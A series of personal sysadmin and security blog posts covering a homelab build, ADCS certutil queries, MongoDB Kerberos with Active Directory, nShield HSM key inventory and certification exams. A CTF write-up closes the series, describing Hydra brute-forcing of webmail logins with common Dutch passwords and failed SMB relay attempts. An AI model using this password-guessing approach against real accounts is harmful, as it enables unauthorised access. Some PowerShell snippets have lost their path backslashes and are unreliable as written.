  5. After running through the basic pfSense configuration, it mostly works out of the box!
  6. I've migrated all the VMs I'd made so far into the "LabLAN" port group, adjusting their IP configurations accordingly. 

BAM! The dev/test VMs are now tucked away into their pocket universe, invisible to our home network. 

EDIT:

The pfSense folks also provide nice documentation on setting up their product inside VMWare ESX.


kilala.nl tags: , ,

View or add comments (curr. 0)

Expanding my homelab

2019-01-10 21:47:00

(C) Dell

For the past X years, I've ran my homelab on my Macbook Air. I've always been impressed with how much you can get away with, on this light portable, sporting an i5 and 8GB of RAM. It'll run two Win2012 VMs and a number of small Linux hosts, aside the MacOS host.

But there's the urge for more! I've been playing with so much cool stuff over the years! I wan't to emulate a whole corporate environment for my studies and tests!

Like the OpenSOC folks, I've been eyeing those Skull Canyon Intel NUCs. They're so sexy! Tiny footprint, combined with great performance! But they're also quite expensive and they don't have proper storage on board. My colleague Martin put me on the trail of local refurbishers and last week I hit gold. 

Well... Fool's Gold, maybe. But still! It was shiny, it looked decent and the price was okay. I bought a refurbished Dell R410

Quick specs:

Yes, it's pretty old already (generation 11 Dell hardware). Yes, it's power hungry. Yes, it's loud. But it was affordable and it's giving me a chance to work with enterprise hardware again, after being out of the server rooms for a long while. 

After receiving the pizza box and inspecting it for damage, the first order of business was to setup its iDRAC6. iDRAC is Dell's solution to what vendors like HP call ILO: a tiny bit of embedded hardware that can be used across the network to manage the whole server's hardware.

The iDRAC configuration was tackled swiftly and the web interface was available immediately. It took a bit of digging in Dell's documentation, but I learned how to flash the iDRAC6 firmware so I could upgrade it to the latest (2.95) version. It really was as easy as downloading the "monolithic" iDRAC firmware, extracting the .D6 file and uploading it through the iDRAC web interface. Actually finding the upload/update button in the interface took more effort :p

Getting the iDRAC6 remote console working took a little more research. For version 6 of the hardware, the remote console relies upon a Java application, which you can call by clicking a button in the web interface. What this does is download a JNLP configuration file, which in turn downloads the actual JAR file for execution. This is a process that doesn't work reliably on modern MacOS due to all the restrictions put on Java. The good news is that Github user Nicola ("XBB") provides instructions on how to reliably and quickly start the remote console for any iDRAC6 on MacOS, Linux and Windows. 

Last night I installed VMWare ESXi 6.5, which I've been told is the highest version that'll work on this box. No worries, it's good stuff! The installation worked well, installing onto a SanDisk Cruzer Fit mini USB-drive that's stuck into the front panel. I still have a lot of learning to do with VMWare :)

In the mean time, there's two VMs building and updating (Win2012 and CentOS7), so I can use them as the basis for my "corporate" environment. 

My plans for the near future:

I'm having so much fun! :D


kilala.nl tags: , ,

View or add comments (curr. 0)

I was accepted as SANS Facilitator!

2018-12-19 20:10:00

Great news everyone!

The excitement is palpable!

A number of past colleagues waxed lyrically about SANS trainings: in-depth, high-tech, wizardry, grueling pace and super-hard work! And at the same time one heck of a lot of fun! And I must admit that I've spent quite a few hours browsing their site, drooling at the courses and exams they offer. They certainly are a well known name in the InfoSec world, having a good reputation and being downright famous for their coin challenges and the high level of skill they both garner and require. 

Unfortunately I could never get past the steep bill! Yes, they're very good! But each course rings in around $6000! And their Netwars and exams don't come cheap either! So I just sighed and closed the tab, only to revisit months later. But this year things changed! Somewhere in September I learned something that I should've known before! I don't even remember whether I read about it on Reddit, on Tweakers or on TechExams, but it was a great find nonetheless!

SANS offer what they call the Work/Study Program. To quote their own site:

"The Work Study Program is a popular and competitive method of SANS training which allows a selected applicant the opportunity to attend a live training event as a facilitator at a highly discounted tuition rate. SANS facilitators are cheerful, friendly, and ever-ready professionals who are selected to assist SANS staff and instructors in conducting a positive learning environment. Advantages of the SANS Work Study Program include:

  • Attend and participate in a 4-6 day course
  • Receive related courseware materials
  • Work with Certified Instructors and SANS Staff
  • Attend applicable Vendor Lunch & Learns, SANS@Night, and other Special Events
  • Opportunities to network with security professionals
  • Free corresponding GIAC certification exam attempt [if available], when lodging onsite at the host hotel
  • Request early access to online OnDemand integrated slides and notes [if available]"

How great is that?! By helping out at the event and putting in a lot of hard work, you get a discount, plus a whole wad of extras to make sure you still get the full benefit of the training you signed up for! I decided then and there to apply for the role of Facilitator for the upcoming Amsterdam event, in January 2019.

I honestly did not think I stood much of a chance because, as SANS say, it's highly competitive and SANS often prefer past SANS-students or -facilitators and I am neither. On the upside, I do have a lot of organizational experience in running events, with many thanks to all those years of staffing and volunteering with AnimeCon

I'd almost forgotten about my application, until a few weeks ago when the email above shows up! OMG! O_O I got accepted!

Now that all the paperwork has been settled I also have a better grasp of both my responsibilities and the perks I'll be receiving. I was assigned to SEC566 - Implementing and Auditing Critical Security Controls, a five-day course (the whole event actually last six days). My duties at the event are actually not disimilar to gophering at AnimeCon! I'll be assisting the course's trainer, basically not leaving their side unless they need something from outside. I'll also be responsible for the security of the assigned classroom and will act a sort-of guide and friendly face to the other students. Where "normal" students will have 0900-1700 days, mine will most likely be 0700-1900. That's gonna be tough! The Sunday before the event starts will also be a full workday, preparing the venue with all the cabling, networking, equipment and the book bags for students. 

And that discount we're getting? When I signed up I had not fully understood what SANS wrote on their site:

"The Work Study tuition fee is USD 1,500 or EUR 1,300 plus any VAT depending on the event location. Should you be selected to facilitate a Summit presentation, the fee is $250 or 217 per day plus any VAT for European events. International Tax/VAT will apply for certain events."

A €1300 discount sounded pretty darn good to me, when combined with all those bonuses! Turns out I misunderstood. The final fee is €1300! So on a total value of >$8100, they're discounting me €6800.  O_O

To say I'm stoked for SANS Amsterdam, would be severely understating my situation! I am very grateful for being given this opportunity and I'm going to work my ass off! I'll make sure SANS won't regret having accepted me!


kilala.nl tags: ,

View or add comments (curr. 0)

Certificate life-cycle management with ADCS

2018-11-28 16:49:00

Following up on my previous post on querying ADCS with certutil, I spent an hour digging around ADCS some more with a colleague. We were looking for ways to make our lives easier when performing certificate life cycle management, i.e. figuring out which certs need replacing soon. 

Want to find all certs that expire before 0800 on January first 2022?

certutil –view –restrict “NotAfter<1/1/2022 08:00”

 

However, this also shows the revoked certificates, so lets focus on those that have the status "issued". Here's a list of the most interesting disposition values.

certutil –view –restrict “NotAfter<1/1/2022 08:00,Disposition=0x14”

 

Now that'll give us the full dump of those certs, so let's focus on just getting the relevant request IDs.

certutil –view –restrict “NotAfter<1/1/2022 08:00,Disposition=0x14” –out “RequestId”

 

Mind you, many certs can be setup to auto-enroll, which means we can automatically renew them through the ADCS GUI by going into Template Management and telling AD to tweak all currently registered holders, making them re-enroll. That's a neat trick!

Of course this leaves us with a wad of certificates that need manual replacement. It's easier to handle these on a per-template basis. To filter on these, we'll need to get the template ID. You can do this through the ADCS GUI, or you can query a known cert and output it's cert template ID.

certutil –view –restrict “requestid=3162” –out certificatetemplate

 

So our query now becomes:

certutil –view –restrict “NotAfter<1/1/2022 08:00,Disposition=0x14,certificatetemplate=1.3.6.1.4.1.311.21.8.7200461.8477407.14696588202437.5899189.95.14580585.6404328” –out “RequestId”

 

Sure, the output isn't easily used in a script unless you add some output parsing (there are white lines and all manner of kruft around the request IDs), but you get the picture. This will at least help you get a quick feeling for the amount of work you're up against. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Kerberos authentication in MongoDB, with Active Directory

2018-11-22 19:35:00

I've been studying MongoDB recently, through the excellent Mongo University. I can heartily recommend their online courses! While not entirely self-paced, they allow you enough flexibility to finish each course within a certain timeframe. They combined video lectures with (ungraded) quizes, and graded labs and an exam. Good stuff!

I'm currently taking M310, the MongoDB Security course. One of the subjects covered is Kerberos authentication with MongoDB. In their lectures they show off a use-case with a Linux KDC, but I was more interested in copying the results with my Active Directory server. It took a little puzzling, a few good sources (linked below) and three hours of mucking with the final troubleshooting. But it works very nicely! 

 

On the Active Directory side:

 We'll have to make a normal user / service account first. I'll call it svc-mongo. This can easily be done in many ways; I used ADUC (AD Users and Computers).

Once svc-mongo exists, we'll connect it to a new Kerberos SPN: a Service Principal Name. This is how MongoDB will identify itself to Kerberos. We'll make the SPN, link it to svc-mongo and make the associated keytab (an authentication file, consider it the user's password) all in one blow:

ktpass /out m310.keytab /princ mongodb/database.m310.mongodb.university@CORP.BROEHAHA.NL /mapuser svc-mongo /crypto AES256-SHA1 /ptype KRB5_NT_PRINCIPAL /pass Password2

 

This creates the m310.keytab file and maps the SPN "mongodb/database.m310.mongodb.university" to the svc-mongo account. The SPN is written in the format "service/fullhostname/domain". The password for the user is also changed and some settings are set pertaining to the used cryptography and Kerberos structures. 

You can verify the SPN's existence with the setspn -Q command. For example:

PS C:usersThomasDocuments> setspn -Q mongodb/database.m310.mongodb.university
Checking domain DC=corp,DC=broehaha,DC=nl
CN=svc-mongo,CN=Users,DC=corp,DC=broehaha,DC=nl
       mongodb/database.m310.mongodb.university

Existing SPN found!

 

The m310.keytab file is then copied to the MongoDB server (database.m310.mongodb.university). In my case I use SCP, because I run Mongo on Linux. 

 

On the Linux side:

The m310.keytab file is placed into /etc/, with permissions set to 640 and ownership root:mongod. In order to use the keytab we can set an environment variable: KRB5_KTNAME="/etc/m310.keytab". This can be done in the profile of the user running MongoDB, or on RHEL-derivates in a sysconfig file. 

We need to setup /etc/krb5.conf with the bare minimum, so the Kerberos client can find the domain:

[libdefaults]
default_realm = CORP.BROEHAHA.NL

[realms]
CORP.BROEHAHA.NL = {
kdc = corp.broehaha.nl
admin_server = corp.broehaha.nl
}

[domain_realm]
.corp.broehaha.nl = CORP.BROEHAHA.NL
corp.broehaha.nl = CORP.BROEHAHA.NL

[logging]
default = FILE:/var/log/krb5.log

 

Speaking of finding the domain, there are a few crucial things that need to be setup correctly!

With that out of the way, we can start making sure that MongoDB knows about my personal user account. If the Mongo database does not yet have any user accounts setup, then we'll need to use the "localhost bypass" so we can setup a root user first. Once there is an administrative user, run MongoD in normal authorization-enabled mode. For example, again the barest of bare minimums:

mongod --auth --bind_ip database.m310.mongodb.university --dbpath /data/db

 

You can then connect as the administrative user so you can setup the Kerberos account(s):

mongo --host database.m310.mongodb.university:27017 --authenticationDatabase admin --user root --password
MongoDB> use $external 
MongoDB> db.createUser({user:"tess@CORP.BROEHAHA.NL", roles:[{role:"root",database:"admin"}]}) 

 

And with that out of the way, now that we can actually use Kerberos-auth. We'll restart MongoD with Kerberos enabled, at the same time disabling the standard Mongo password authentication and thus lock out the root user we used above. 

mongod --auth --bind_ip database.m310.mongodb.university --authenticationMechanisms=GSSAPI --dbpath /data/db

 

We can then request a Kerberos ticket for my own account, start a Mongo shell and authenticate inside Mongo as myself:

root@database:~# kinit tess@CORP.BROEHAHA.NL -V
Using default cache: /tmp/krb5cc_0
Using principal: tess@CORP.BROEHAHA.NL
Password for tess@CORP.BROEHAHA.NL:
Authenticated to Kerberos v5

root@database:~# mongo --host database.m310.mongodb.university:27017
MongoDB shell version: 3.2.21
connecting to: database.m310.mongodb.university:27017/test

MongoDB Enterprise > use $external
switched to db $external

MongoDB Enterprise > db.auth({mechanism:"GSSAPI", user:"tess@CORP.BROEHAHA.NL"})
1

 

HUZZAH! It worked!

Oh right!.. What was the thing that took me hours of troubleshooting? Initially I ran MongoD without the --bind_ip option to tie it to the external IP address and hostname. I was running it on localhost. :( And thus the MongoD process identified itself to the KDC as mongodb/localhost. It never showed that in any logging, so that's why I missed it. I had assumed that simply passing the keytab file was enough to authenticate.

 

Sources:


kilala.nl tags: , ,

View or add comments (curr. 0)

Query ADCS (Active Directory Certificate Services) for certificate details

2018-11-01 18:44:00

I think Microsoft's ADCS is quite a nice platform to work with, as far as PKI systems go. I've heard people say that it's one of the nicest out there, but given its spartan interface that kind of makes me worry for the competitors! One of the things I've fought with, was querying the database backend, to find certificates matching specific details. It took me a lot of Googling and messing around to come up with the following examples.

 

To get the details of a specific request:

certutil -view -restrict "requestid=381"

 

To show all certificate requests submitted by myself:

certutil -view -restrict "requestername=domain\t.sluijter"

 

To show all certificates that I requested, displaying the serial numbers, the requestor's name and the CN on the certificate. It'll even show some statistics at the bottom:

certutil -view -restrict "requestername=domain\t.sluijter" -out "serialnumber,requestername,commonname"

 

Show all certificates provided to TESTBOX001. The query language is so unwieldy that you'll have to ask for "hosts >testbox001 and <testbox002".

certutil -view -restrict "commonname>testbox001,commonname<testbox002" -out "serialnumber,requestername,commonname"

 

A certificate request's disposition will show you errors that occured during submission, but it'll also show other useful data. Issued certificates will show whom approved the issuance. The downside to this is that the approver's name will disappear once the certificate is revoked. So you'll need to retain the auditing logs for ADCS!

certutil -view -restrict "requestid=381" -out "commonname,requestername,disposition,dispositionmessage"    

certutil -view -restrict "requestid=301" -out "commonname,requestername,disposition,dispositionmessage"    

 

Would you like to find out which certificate requests I approved? Then we'll need to add a bit more Powershell.

certutil -view -out "serialnumber,dispositionmessage" | select-string "Resubmitted by DOMAIN\t.sluijter"

 

Or even better yet:

certutil -view -out "serialnumber,dispositionmessage" | ForEach {

    if ($_ -match "^.*Serial Number:"){$serial = $_.Split('"')[1]}

    if ($_ -match "^.*Request Disposition Message:.*Resubmitted by DOMAIN\t.sluijter"){ Write-Output "$serial" }

    }

 

Or something very important: do you want to find certificates that I both request AND approved? That's a bad situation to be in...

certutil -view -restrict "requestername=domain\t.sluijter" -out "serialnumber,dispositionmessage" | ForEach {

    if ($_ -match "^.*Serial Number:"){$serial = $_.Split('"')[1]}

    if ($_ -match "^.*Request Disposition Message:.*Resubmitted by DOMAIN\t.sluijter"){ Write-Output "$serial" }

    }

 

If you'd like to take a stab at the intended purpose for the certificate and its keypair, then you can take a gander at the template fields. While the template doesn't guarantee what the cert is for, it ought to give you an impression. 

certutil -view -restrict "requestid=301" -out "commonname,requestername,certificatetemplate"


kilala.nl tags: , , ,

View or add comments (curr. 0)

Another quarter, another beta

2018-10-05 21:07:00

I took the CompTIA Linux+ beta (XK1-004) today and I wasn't very impressed... It's "ok".

I have no recent experience with LPIC or with the previous version of Linux+, only with LPIC from ten years ago. Based on that I feel that the new Linux+ is less... exciting? thrilling? than what I'd expect from LPIC. It feels to me like a traditional Linux-junior exam with its odd fascination on TAR, but with modern subjects (like Git or virtualization) tacked on the side.

Personally I disliked one of the PBQ's, with a simulated terminal. This simulation would only accept the exact, literal command and parameter combinations that have been programmed into it. Anything else, any other permutation of flags, results in the same error message. Imagine my frustration when a command that I run almost daily to solve the question at hand is not accepted, because I'm not using the exact flags or the order thereof that they want me to type. 

Anyway. I'm glad that I took the beta, simply to get more feeling of the (international) market place. Now at least I'll know what the cert entails, should I ever see it on an applicant's resumé. :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Passed the PenTest+ beta exam!

2018-07-31 21:29:00

A bit over three months ago, I took part in CompTIA's beta version of the PenTest+ exam. It was a fun and learning experience and despite having some experience, I didn't expect to pass. 

Turns out, I did! I passed with an 821 out of 900 score :D 

Now, I hope that some of the feedback I provided has been useful. That's the point of those beta exams, isn't it?


kilala.nl tags: , ,

View or add comments (curr. 1)

CFR-310 beta exam experience

2018-07-17 22:08:00

I guess I've found a new hobby: taking beta-versions of cybersec certification exams. :)

Three months ago I took the CompTIA Pentest+ beta and not half an hour ago I finished the CertNexus CFR-310 beta. Like before, I learned about the beta-track through /r/netsecstudents where it was advertised with a discount code bringing the $250 exam down to $40 and ultimately $20. Regardless of whether the certification has any real-world value, that's a nice amount to spend on some fun!

To sum up my experience:

Now... Is the CFR-310 certification "worth it"? As I've remarked on Peerlyst earlier this week: it depends.

If you have a specific job requirement to pass this cert, then yes it's obviously worth it. Then again, most likely your employer or company will spring for the exam and it won't be any skin off your back. And if you're a forward thinking contractor looking to get assignments with the DoD, then it could certainly be useful to sit the exam as it's on the DoD 8570 list for two CSSP positions.

If, like me, you're relatively free to spend your training budget and you're looking for something fun to spend a few weeks on, then I'd suggest you move on to CompTIA's offerings. CertNexus / Logical Operations are not names I'd heard before and CompTIA is a household-name in IT; has been for years. 


kilala.nl tags: , ,

View or add comments (curr. 1)

Synology vagueries: slow transfers, 100% volume util, very high load average, very high IOWAIT

2018-06-28 22:30:00

I've been a very happy user of Synology systems for quite a few years now. The past few weeks I've ran into quite some performance issues though, so I decided to get to the bottom of it.

Symptoms:

I have undertaken a few steps that seem to have gotten me in the right direction...

  1. I have gone over the list of active services and disabled the ones I do not use.
  2. I verified the installed packages and I've removed all the things I really don't need.
  3. I have disabled the Universal Search function, which cannot be disabled without trickery (see below).
  4. I have disabled the Indexing daemon in full, which also cannot be disabled without extra effort (also below).

In order to disable Universal Search:

  1. Login through SSH
  2. cd /var/packages/SynoFinder
  3. sudo cp INFO INFO.orig
  4. sudo vi INFO

Make the following changes:

ctl_stop="yes"
ctl_uninstall="yes"

You can now restart Package Center in the GUI, browse to Universal Search / SynoFinder and stop the service. You could even uninstall it if you like.

In order to disable the Indexer daemon:

  1. Login through SSH
  2. sudo synoservice --hard-stop synoindexd
  3. sudo synoservice --disable synoindexd

The second step is needed to also stop and disable the synomkthumb and synomkflvd services, which rely upon the synoindexd.

One reboot later and things have quieted down. I'll keep an eye on things the next few days.


kilala.nl tags: ,

View or add comments (curr. 5)

Keywords for this week: Windows, Linux, PKI and DAMTA

2018-06-24 20:41:00

It's gonna be a busy week! 

Most importantly, I'll be taking CQure's "DAMTA" training: Defense Against Modern Targeted Attacks. Basically, an introduction to threat hunting and improved Blue Teaming. Sounds like it's going to be a blast and I'm looking forward to it a lot :)

Unfortunately this also means I'll be gone from the office at $CLIENT for three days; that bits, 'cause I'm in the midst of a lot of PKi and security-related activities. To make sure I don't fall behind too much I'm running most of my experiments in the evenings and weekend. 

For example, I've spent a few hours this weekend on setting up a Microsoft ADCS NDES server, which integrates with my Active Directory setup and the base ADCS. My Windows domain works swimmingly, but now it's time to integrate Linux. Now I'm looking at tools like SSCEP and CertMonger to get the show on the road. To make things even cooler, I'll also integrate both my Kali and my CentOS servers with AD. 

Busy, busy, busy :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Handy tool to troubleshoot your Microsoft ADCS PKI

2018-06-23 14:08:00

Doesn't look like much, but it's great

It has been little over a year now since I started at $CLIENT. I've learned so many new things in those twelve months, it's almost mindboggling. Here's how I described it to an acquaintance recently:

"To say that I’m one lucky guy would be understating things. Little over a year ago I was interviewed to join a project as their “pki guy”: I had very little experience with certificates, had messed around a bit with nShield HSMs, but my customer was willing to take a chance on me. ... ... A year onwards I’ve put together something that I feel is pretty sturdy. ... We have working DTAP environments, the production environment’s been covered with a decent keygen ceremony and I’m training the support crew for their admin-tasks. There’s still plenty of issues to iron out, like our first root/issuing CA renewal in a few weeks, but I’m feeling pretty good about it all."

As I described to them, I feel that I'm at a 5/10 right now when it comes to PKI experience. I have a good grasp of the basics, I understand some of the intricacies, I've dodged a bunch of pitfalls and I've come to know at least one platform.

How little I know about this specific platform (Microsoft's Active Directory Certificate Services) gets reinforced frequently, for example by stumbling upon Brian Komar's reply to this thread. The screenshot above might not look like much, but it made my day yesterday :) "Pkiview.msc" you say? It builds a tree-view of your PKI's structure on the lefthand side and on the right side it will show you all the relevant data points for each CA in the list. 

This is awesome, because it will show you immediately when one of your important pieces of meta-data goes unavailable. For example, in the PKI I built I have a bunch of clones of the CRL Distribution Point (CDP) spread across the network. Oddly, these clones were lighting up red in the pkiview tool. Turns out that the cloning script had died a whiles back, without any of us noticing. 

So yeah, it may not look like much, but that's one great troubleshooting tool :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Inventory of certificates, private keys and nShield HSM kmdata files

2018-05-22 18:54:00

Building on my previous Thales nShield HSM blog post, here's a nice improvement.

If you make an array with (FQDN) hostnames of HSM-clients you can run the following Powershell script on your RFS-box to traverse all HSM-systems so you can cross-reference their certs to the kmdata files in your nShield RFS.

$Hosts="host1","host2","host3"

ForEach ($TargetHost) in $Hosts)

{
               Invoke-Command -ComputerName $TargetHost -ScriptBlock {
                              $Thumbs=Get-ChildItem cert:LocalMachineMy
                             ForEach ($TP in $Thumbs.thumbprint) {
                                             $BLOB=(certutil -store My $TP);
                                             $HOSTNAME=(hostname);
                                             $SUBJ=($BLOB | Select-String "Subject:").ToString().Replace("Subject: ","");
                                             $CONT=($BLOB | Select-String "Key Container =").ToString().Replace("Key Container = ","").Replace(" ","");
                                             Write-Output "$HOSTNAME $TP ""$SUBJ"" ""$CONT""";
                             }
              }

 
$KeyFiles = Get-ChildItem 'C:ProgramData CipherKey Management DataLocalkey_caping*'
ForEach ($KMData in $KeyFiles) {
               $CONT=(kmfile-dump -p $KMData | Select -First 7 | Select -Last 1)
               Write-Output "$KMData $CONT";
}

 

For example, output for the previous example would be:

TESTBOX F34F7A37C39255FA7E007AE68C1FE3BD92603A0D "CN=testbox, C=thomas, C=NL" "ThomasTest"

C:ProgramData CipherKey Management DataLocalkey_caping_machine--a45b47a3cee75df2fe462521313eebe9ef5ab4                    ThomasTest

 

The first line is for host TESTBOX and it shows the certificate for the testbox certificate, with a link to the ThomasTest container. The second line shows the specific kmdata file that is tied to the ThomasTest container. Nice :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

Matching Windows certificates to nShield protected keys (kmdata)

2018-05-22 18:39:00

Over the past few weeks I've had a nagging question: Windows certutil / certlm.msc has an overview of the active certificates and key pairs for a computer system, but when your keys are protected by an Thales nShield HSM you can't get to the private keys. Fair enough. But then there's the %NFAST_KMDATA% directory on the nShield RFS-server, whose local subdirectory contains all of the private keys that are protected by the HSM. And I do mean all the key materials. And those files are not marked in easy to identify ways. 

So my question? Which of the files on the %NFAST_KMDATA%/local ties to which certificate on which HSM-client?

I've finally figured it all out :) Let's go to Powershell!

 

PS C:Windowssystem32> cd cert:LocalMachineMy

PS Cert:LocalMachineMy> dir
   Directory: Microsoft.PowerShell.SecurityCertificate::LocalMachineMy

Thumbprint                                Subject
----------                                -------
F34F7A37C39255FA7E007AE68C1FE3BD92603A0D  CN=testbox, C=thomas, C=NL
...

 

So! After moving into the "Personal" keystore for the local system you can see all certs by simply running dir. This will show you both the thumbprint and the Subject of the cert in question. Using the Powershell Format-List command will show you the interesting meta-info (the example below has many lines remove).

 

PS Cert:LocalMachineMy> dir F34F7A37C39255FA7E007AE68C1FE3BD92603A0D | fl *
...
DnsNameList              : {testbox}
...
HasPrivateKey            : True
PrivateKey               :
PublicKey                : System.Security.Cryptography.X509Certificates.PublicKey
SerialNumber             : 6FE2C038ED73E7A0469E5E3641BD3690
Subject                  : CN=testbox, C=thomas, C=NL

 

Cool! Now, the two bold-printed, underlined lines are interesting, because the system tells you that it does have access to the relevant private key, but it does not have clear informatin as to where this key lives. We can turn to the certutil tool to find the important piece to the puzzle: the key container name

 

PS Cert:LocalMachineMy> certutil -store My F34F7A37C39255FA7E007AE68C1FE3BD92603A0D
...
Serial Number: 6fe2c038ed73e7a0469e5e3641bd3690
Subject: CN=testbox, C=thomas, C=NL
 Key Container = ThomasTest
 Provider = nCipher Security World Key Storage Provider
Private key is NOT exportable
... 

Again, the interesting stuff is bold and underlined. This shows that the private key is accessible through the Key Storage Provider (KSP) "nCipher Security World KSP" and that the relevant container is named "ThomasTest". This name is confirmed by the nShield command to list your keys:

 

PS Cert:LocalMachineMy> cnglist --list-keys
ThomasTest: RSA machine
...

 

Now comes the tricky part: the key management data files (kmdata) don't have a filename tying them to the container names:

 

PS Cert:LocalMachineMy> cd 'C:programdata CipherKey Management DataLocal'

PS C:programdata CipherKey Management DataLocal> dir
...
-a---        27-12-2017     14:03       5336 key_caping_machine--...
-a---        27-12-2017     14:03       5336 key_caping_machine--...
-a---        27-12-2017     11:46       5336 key_caping_machine--...
-a---         15-5-2018     13:37       5188 key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4...

 

So, let's try an old-fashioned grep shall we? :)

 

PS C:programdata CipherKey Management DataLocal> Select-String thomastest *caping_*
key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4:2:   ThomasTest  ?   ∂   Vu ?{?%f?&??)?U;?m???   ??  ??  ??  1???B'?????'@??I?MK?+9$KdMt??})???7?em??pm?? ?

 

This suggests that we could inspect the kmdata files and find out their key container name. 

 

PS C:programdata CipherKey Management DataLocal> kmfile-dump -p key_caping_machine--a45b47a3cee75df2fe462521313eebe9ef5ab4
key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
 AppName
       caping
 Ident
       machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
 Name
       ThomasTest
...

SHAZAM! 

Of course we can also inspect all the key management data files in one go:

 

PS: C:> $Files = Get-ChildItem 'C:ProgramData CipherKey Management DataLocalkey_caping*'

PS: C:> ForEach ($KMData in $Files) {kmfile-dump -p $KMData | Select -First 7)
C:ProgramData CipherKey Management DataLocalkey_caping_machine--a45b47a3cee75df2fe462521313eebe9ef5ab4
 AppName
       caping
 Ident
       machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
 Name
       ThomasTest

 


kilala.nl tags: , ,

View or add comments (curr. 0)

Microsoft OCSP Responders, nShield HSMs and vagueries

2018-05-17 20:18:00

Over the past few months I've built a few PKI environments, all based on Microsoft's ADCS. One of the services I've rolled out is the Microsoft OCSP Responder Array: a group of servers working together to provide OCSP responses across your network. 

I've run into some weirdness with the OCSP Responders, when working with the Thales / nCipher nShield HSMs. For example, the array would consist of a handful of slaves and one master server. Everything'd be running just fine for a week or so, until it's time to refresh the OCSP signing certificates. Then, one out of the array starts misbehaving! All the other nodes are fine, but one of'm just stops serving responses. 

The Windows Event Log contains error codes involving “CRYPT_E_NO_PROVIDER”, “NCCNG_NCryptCreatePersistedKey existing lock file” and "The Online Responder Service could not locatie a signing certificate for configuration XXXX. (Cannot find the original signer)". Now that second one is a big hint!

I haven't found out why yet, but the problem lies in lock files with the HSM's security world. If you check %NFAST_KMDATA%local you'll find a file with "lock" at the end of its name. Normally when requesting a keypair from the HSM, a temporary lock is created which gets removed once the keypair is provided. But for some reason the transaction doesn't finish and the lock file stays in place.

For now, the temporary solution is to:

  1. Stop the Online Responder Service.
  2. Remove the lock file from %NFAST_KMDATA%local.
  3. Restart the Oniine Responder Service

With that out of the way, here's two other random tidbits :)

In some cases the service may throw out errors like "Online Responder failed to create an enrollment request" in close proximity to "This operation requires an interactive window station". This happens when you did not setup the keys to be module-protected. The service is asking your HSM for its keys and the HSM is in turn asking you to provide a quorum of OCS (operator cards). If you want the Windows services to auto-start at boot time, always set their keys up as "module protected". And don't forget to run both capingwizard64.exe and domesticwizard64.exe to set this as the default as well!

Finally, from this awesome presentation which explains common mistakes when building an AD PKI: using certutil -getreg provides boatloads of useful information! For example, in order for OCSP responses to be properly signed after rolling over your keypairs, you'll need to certutil -setreg caUseDefinedCACertInRequest 1.

(Seriously, Mark Cooper is a PKI wizard!)


kilala.nl tags: , ,

View or add comments (curr. 0)

CompTIA PenTest+ experience

2018-04-16 12:55:00

I've taken the day off, despite things being quite busy at the office, to have a little fun. Specifically, I've just arrived back home after sitting the CompTIA PenTest+ Beta exam. Taking an exam for fun? Absolutely :)

It's no surprise that I first heard about the newly developed exam on Reddit, with the CompTIA team calling for 400 people to take the beta-version of the exam. We're not getting any scores yet, as they'll first tally all the outcomes to determine weaknesses and flaws in questions that may affect scoring negatively. But once the process has completed, if (and that's an IF) you passed you'll gain full accreditation for the cert. All that and a fun day, for just $50? Sign me up :)

Being a non-native english speaker I was given an extension, tackling 110 questions in 220 minutes (instead of 165). That was certainly doable: I got up from my seat with two hours gone. Overall I can say that my impression of the exam is favorable! While one or two specific topics may have stolen the limelight, I can say that my exam covered a diverse array of subjects. The "simulation" questions as they call them were, ehh, okay. They're not what I would call actual simulations, they're more like interactive screens, but I do feel they added something to the experience. 

Yeah! Not bad at all! I would heartily endorse this certification track instead of EC Council's CEH. The latter may have better brand-recognition in EMEA, but CompTIA is still known as a respectable organization. 

So, did I pass? I don't know :) As I said, the subject matter turned out to be very diverse, in a very good way. Thus it also covered things I have zero to very little experience with, while an experienced pen-tester would definitely know. And that's the point: despite passing the OSCP exam last year, I -am- still a newbie pen-tester. So if I fail this exam, then I'll feel that it's a justified failure. 


kilala.nl tags: ,

View or add comments (curr. 2)

Cincero CTF036 - 2018 edition

2018-04-01 13:16:00

The battlegrounds

Image credits go to Cincero, who took photos all day.

Another year, another CTF036! No longer under the Ultimum flag, but this time organised by Cincero / Secured by Design. Same awesome people, different company name. The 2016 and 2017 editions were awesome and this year's party lived up to its fame.

As is tradition, the AM was filled with presentations. I was invited to talk as well, but I didn't have anything presentable ready to go; maybe next year! It was a busy day, and Wesley kicked off with DearBytes' findings about the security of home automation systems. Good talk, which had my colleague Dirk's attention because his home is pretty heavily filled with that stuff ;)

Dick and I would be teaming up under the Unixerius flag. Lunch was sorted pretty quickly, so we set up our systems around 12:30. Between us two we had three laptops, with my burner laptop serving as Google-machine through my mobile data connection (the in-house Internet connection wasn't very fast). The casus was consistent with the last years: a description of the target, an explanation why we were hacking their servers and a few leads to get us started. To sum it up:

First order of business: slurp down anything the DNS would give us (a successful zone transfer showed just the four systems, spread across two ranges) and run some port scans against the front two boxen. Results?

While perusing the website, we found a number of valid email addresses for employees to try on Squirrelmail. After going over my old OSCP notes, Dick put together a userlist and got to work with Hydra in hopes of brute-forcing passwords for their accounts. This is where the basic Kali stuff isn't sufficient: there are no wordlists for Dutch targets :) While rockyou.txt is awesome, it won't contain famous passwords such as Welkom01, Maandag2018, Andijvie18 and so on. It's time to start putting together a set of rules and wordlists for Dutch targets! In the end we got into two mailboxes, which got us another seven cards: 140 points. 

Unfortunately we didn't get any points beyond that, despite trying a lot of avenues!

Open SMB shares: Dirk suspected there was more to the open SMB shares, so he focused on those. Turning to Metasploit and others, he hoped to perform a SMB relay attack using the MSF tooling. Michael later confided that EternalBlue would not work (due to patching), but that the SMB redir was in fact the way to go. Unfortunately Dick couldn't get this one to work; more troubleshooting needed. 

Squirrelmail REXEC: Dick noticed that the Squirrelmail version was susceptible to a remote command execution vulnerability. Unfortunately, after quite a bit of trying he concluded that this particular install had been patched. Darn!

